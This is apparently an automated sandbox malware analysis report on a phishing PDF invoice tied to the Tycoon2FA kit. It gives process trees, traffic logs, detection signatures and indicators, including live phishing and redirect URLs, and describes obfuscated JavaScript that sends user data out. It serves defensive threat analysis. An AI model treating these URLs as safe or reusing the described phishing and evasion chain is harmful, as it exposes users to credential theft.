Windows Analysis Report
Invoice1-1706517.pdf

Overview

General Information

Sample name: Invoice1-1706517.pdf
Analysis ID: 1646841
MD5: 5af5ee83faae160ffab3cd5c8cd28117
SHA1: 40c1f5fa7e36d118aaf8b467f455eb1c6189eaf6
SHA256: 53924aaf790a371a77f5fe5bc1c85ed924e4c26762eea55911845744692274a8
Detection

Invisible JS, Tycoon2FA
Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Multi AV Scanner detection for submitted file
Yara detected AntiDebug via timestamp check
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript

Classification

[Classification wheel: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious]

Process Tree
  • System is w10x64_ra
  • Acrobat.exe (PID: 6264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invoice1-1706517.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6440 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6664 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1668 --field-trial-handle=1592,i,2184534190769647755,12034686172842368048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • chrome.exe (PID: 1916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://stuartburrell.co.uk/pad1.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 4004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,8760627637937200913,13153085085483446613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Yara Overview

Source | Rule | Description | Author | Strings
0.1.d.script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
0.1.d.script.csv | JoeSecurity_AntiDebugBrowser | Yara detected AntiDebug via timestamp check | Joe Security |
0.0.d.script.csv | JoeSecurity_HangulCharacter | Yara detected Obfuscation Via HangulCharacter | Joe Security |
0.0.d.script.csv | JoeSecurity_InvisibleJS | Yara detected Invisible JS | Joe Security |
0.5.d.script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
            No Sigma rule has matched
            No Suricata rule has matched


            AV Detection

Source: Invoice1-1706517.pdf | Virustotal: Detection: 10%
Source: Invoice1-1706517.pdf | ReversingLabs: Detection: 15%

            Phishing

Source: https://qs1ywa.vsmaemhjvk.ru/vHFigT/ | Joe Sandbox AI: Score: 7 | Reasons: The brand 'OGFR' is not recognized as a known or well-known brand., The URL 'qs1ywa.vsmaemhjvk.ru' does not match any known legitimate domain associated with a recognized brand., The domain extension '.ru' is a country code for Russia, which may not be relevant to the brand 'OGFR' if it is not a Russian brand., The URL contains random characters and does not resemble a legitimate domain name., The presence of a CAPTCHA input field is common in phishing sites to create a false sense of security. | DOM: 0.0.pages.csv
Source: Yara match | File source: 0.0.d.script.csv, type: HTML
Source: Yara match | File source: 0.0.pages.csv, type: HTML
Source: Yara match | File source: 0.0.d.script.csv, type: HTML
Source: Yara match | File source: 0.4..script.csv, type: HTML
Source: Yara match | File source: 0.0.pages.csv, type: HTML
Source: Yara match | File source: 0.1.d.script.csv, type: HTML
Source: Yara match | File source: 0.5.d.script.csv, type: HTML
Source: PDF document | Joe Sandbox AI: Page contains button: 'Open' Source: 'PDF document'
Source: PDF document | Joe Sandbox AI: PDF document contains prominent button: 'open'
Source: 0.2..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://qs1ywa.vsmaemhjvk.ru/vHFigT/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending user data to an untrusted domain, which is a clear indicator of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: 0.4..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://qs1ywa.vsmaemhjvk.ru/vHFigT/... This script demonstrates high-risk behavior with the use of the `eval` function to execute dynamic code. The code is also heavily obfuscated, making it difficult to analyze and understand its true purpose. These factors indicate a high likelihood of malicious intent, and the script should be treated with caution.
Source: https://qs1ywa.vsmaemhjvk.ru/vHFigT/ | HTTP Parser: No favicon
Source: unknown | HTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.251.40.100:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 0MB later: 40MB
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 185.199.220.71
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: x1.i.lencr.org
Source: global traffic | HTTP traffic detected:
    GET /pad1.pdf HTTP/1.1
    Host: stuartburrell.co.uk
    Connection: keep-alive
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /vHFigT/ HTTP/1.1
    Host: qs1ywa.vsmaemhjvk.ru
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /jquery-3.6.0.min.js HTTP/1.1
    Host: code.jquery.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://qs1ywa.vsmaemhjvk.ru/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Host: qs1ywa.vsmaemhjvk.ru
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://qs1ywa.vsmaemhjvk.ru/vHFigT/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
    Cookie: XSRF-TOKEN=eyJpdiI6ImNHMG9PcHpzNUxJaFVHa1BKbHJpclE9PSIsInZhbHVlIjoiRjVOVi81MjNxMi9lVkZJc0pLT3RMV0JNZTZBcEtGdnBSdG5kOENuREVEdmdaYkF2YTd0dHM3ZGlsY3pTTStaVElhb2F4bURZeG82aVpGeEpVblB2VnVRZk5sc1BWbjFjL3ZXaW16NEtMSGVWSXprZ0ZrUU1lelNURDVtSVo2eDMiLCJtYWMiOiIzNjA1OTYxM2ExMDI4Y2U5OTU3MWM5MmViYTkwZmY3N2JkNTMzMGI1ZmE0ZTI4NTgzYzQ1MWRmMzA5ZmI3ZTI5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjVyVlFlaENzbEIwRUl0N0xGRUtkTHc9PSIsInZhbHVlIjoiZmYybmxva1dMTGRmWDA3RE1RN2JnakExRW1qMUM1NysrQnBPSUt5dCswR256MUs3czNTb0ZRdU9kQUZPb0RYcmY4VUxZbGVQd0ttb3ZpY3h1eGE1OXpEVEtnbWhTNlRLOW83WVN6OGtRZ21UVVBpZFVER0phc2x4eTBPTk1URUkiLCJtYWMiOiJhMmUwOTg2ZGQzMTY1MmM0MmIyYmI2NGYwYmY4NWE0N2QxNzU1MjljYzk4NTVmMDM4OWU4MmZhNjU2NGYzMGI5IiwidGFnIjoiIn0%3D
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: qs1ywa.vsmaemhjvk.ru
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: unknown | HTTP traffic detected:
    POST /report/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41 HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Content-Length: 435
    Content-Type: application/reports+json
    Origin: https://qs1ywa.vsmaemhjvk.ru
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Mon, 24 Mar 2025 09:05:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Vary: Accept-Encoding
    server-timing: cfL4;desc="?proto=TCP&rtt=16350&min_rtt=16337&rtt_var=4619&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2237&delivery_rate=246420&cwnd=252&unsent_bytes=0&cid=bf6b56daf4afe5c7&ts=188&x=0"
    Cache-Control: max-age=14400
    CF-Cache-Status: MISS
    Server: cloudflare
    CF-RAY: 925501e64f2a5017-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=105240&min_rtt=105166&rtt_var=22298&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1905&delivery_rate=35344&cwnd=245&unsent_bytes=0&cid=22207620d4731cc4&ts=475&x=0"
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: classification engine | Classification label: mal96.phis.evad.winPDF@34/45@9/91
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6332
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-24 05-03-55-078.log
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invoice1-1706517.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1668 --field-trial-handle=1592,i,2184534190769647755,12034686172842368048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 3F077BA791F69DD3F614CDDCFCD0C79D
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://stuartburrell.co.uk/pad1.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,8760627637937200913,13153085085483446613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Invoice1-1706517.pdf | Initial sample: PDF keyword /JS count = 0
Source: Invoice1-1706517.pdf | Initial sample: PDF keyword /JavaScript count = 0
Source: Invoice1-1706517.pdf | Initial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: Yara match | File source: 0.1.d.script.csv, type: HTML
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information queried: ProcessInformation
MITRE ATT&CK Matrix

Techniques are listed per tactic column; a leading number marks a technique that signatures in this analysis matched, with the number of matches.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron
Persistence: 2 Browser Extensions, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook
Privilege Escalation: 1 Process Injection, 1 Extra Window Memory Injection, Logon Script (Windows), Login Hook
Defense Evasion: 1 Masquerading, 1 Process Injection, 1 Extra Window Memory Injection, Binary Padding
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
Discovery: 1 Process Discovery, 1 System Information Discovery, Query Registry, System Network Configuration Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
Command and Control: 1 Encrypted Channel, 4 Non-Application Layer Protocol, 5 Application Layer Protocol, 3 Ingress Tool Transfer
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Invoice1-1706517.pdf | 11% | Virustotal | | Browse
Invoice1-1706517.pdf | 16% | ReversingLabs | Document-PDF.Trojan.ScamX |

Dropped Files / Unpacked PE Files / Domains: No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://qs1ywa.vsmaemhjvk.ru/vHFigT/ | 0% | Avira URL Cloud | safe
https://stuartburrell.co.uk/pad1.pdf | 0% | Avira URL Cloud | safe
https://qs1ywa.vsmaemhjvk.ru/favicon.ico | 0% | Avira URL Cloud | safe
https://a.nel.cloudflare.com/report/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41 | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
a.nel.cloudflare.com | 35.190.80.1 | true | false | | high
e8652.dscx.akamaiedge.net | 23.46.224.249 | true | false | | high
code.jquery.com | 151.101.66.137 | true | false | | high
www.google.com | 142.251.40.100 | true | false | | high
qs1ywa.vsmaemhjvk.ru | 104.21.96.1 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
URLs

Name | Malicious | Antivirus Detection | Reputation
https://qs1ywa.vsmaemhjvk.ru/vHFigT/ | true | Avira URL Cloud: safe | unknown
https://stuartburrell.co.uk/pad1.pdf | false | Avira URL Cloud: safe | unknown
https://code.jquery.com/jquery-3.6.0.min.js | false | | high
https://qs1ywa.vsmaemhjvk.ru/favicon.ico | false | Avira URL Cloud: safe | unknown
https://a.nel.cloudflare.com/report/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41 | false | Avira URL Cloud: safe | unknown
IPs

IP | Domain | Country | ASN | ASN Name | Malicious
3.219.243.226 | unknown | United States | 14618 | AMAZON-AESUS | false
142.250.80.35 | unknown | United States | 15169 | GOOGLEUS | false
142.250.80.46 | unknown | United States | 15169 | GOOGLEUS | false
23.210.73.6 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
64.233.180.84 | unknown | United States | 15169 | GOOGLEUS | false
142.250.80.110 | unknown | United States | 15169 | GOOGLEUS | false
185.199.220.71 | unknown | United Kingdom | 12488 | KRYSTALGR | false
142.250.80.74 | unknown | United States | 15169 | GOOGLEUS | false
23.51.56.185 | unknown | United States | 4788 | TMNET-AS-APTMNetInternetServiceProviderMY | false
23.47.168.24 | unknown | United States | 16625 | AKAMAI-ASUS | false
142.251.40.100 | www.google.com | United States | 15169 | GOOGLEUS | false
104.21.96.1 | qs1ywa.vsmaemhjvk.ru | United States | 13335 | CLOUDFLARENETUS | true
151.101.66.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
23.46.224.249 | e8652.dscx.akamaiedge.net | United States | 16625 | AKAMAI-ASUS | false
172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                           IP
                           192.168.2.16 (private address of the analysis system)
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1646841
                          Start date and time:2025-03-24 10:03:21 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                           Number of new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:Invoice1-1706517.pdf
                          Detection:MAL
                          Classification:mal96.phis.evad.winPDF@34/45@9/91
                          Cookbook Comments:
                          • Found application associated with file extension: .pdf
                          • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 23.51.56.185, 3.219.243.226, 52.22.41.97, 3.233.129.217, 52.6.155.20, 172.64.41.3, 162.159.61.3, 23.210.73.6, 23.210.73.5, 23.219.161.132, 52.149.20.212, 23.47.168.24, 184.31.69.3
                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net
                           • Not all processes were analyzed; the report is missing behavior information
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: qs1ywa.vsmaemhjvk.ru
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):290
                          Entropy (8bit):5.113183596641159
                          Encrypted:false
                          SSDEEP:
                          MD5:A87A6295C345EA684C6E53F57BB0A82B
                          SHA1:2F8F079328386F00981C47D7CDF7D6554D8A9646
                          SHA-256:D53CAAF88FF21712BDFF574AC6FE63C1BC6176E8574C301E1886BBA7B6E1960C
                          SHA-512:A266CC61F7CF5C61A359F23D150213EC66A0F9F20ABD62013567AD7088A9FFF2CD912A25DF488B5EDE8C45414E215561F2244E6577077553B12682DB1847E274
                          Malicious:false
                          Reputation:unknown
                          Preview:2025/03/24-05:03:53.555 1a04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/24-05:03:53.557 1a04 Recovering log #3.2025/03/24-05:03:53.557 1a04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):334
                          Entropy (8bit):5.127063322482641
                          Encrypted:false
                          SSDEEP:
                          MD5:E803E901194E4BC2F15602FDD6391FC1
                          SHA1:A3802AE89BD7256A0DF42011B459B52D651D49AE
                          SHA-256:3129DEC16BC9522E216F072F3C96299577F677FE69B0169021D6C3D84341F4D5
                          SHA-512:217273B8D788ADB30D917EA2BA269FA3CE86A703045690815659A15A0352AE9A8CBE06ECE307FC19612424FF331E96FEF53FBEA52A1F7DFB07E108385DCFA1D5
                          Malicious:false
                          Reputation:unknown
                          Preview:2025/03/24-05:03:53.453 1a24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/24-05:03:53.456 1a24 Recovering log #3.2025/03/24-05:03:53.457 1a24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):403
                          Entropy (8bit):4.991087960333126
                          Encrypted:false
                          SSDEEP:
                          MD5:BC5B4369AB0CCEFA90387BD2E7159B64
                          SHA1:3F9A8E0D814670EF84F0C53262239341FC255F92
                          SHA-256:2A6AFFDCBC67763C8DD82FB1630ED95BEE86066CD894AE3595ECB3DDF2BDA33F
                          SHA-512:AAA7BCD97376AEA89B8467A03DBDBE4BDC530A89E4D2E46ACBEAAB71DCFCE17F3722A730C494CC5C1DE5BA9E516C8E526F778C3FC5830DA8C8411B6611FD77DC
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13387367045381780","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":107352},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:4C313FE514B5F4E7E89329630909F8DC
                          SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                          SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                          SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
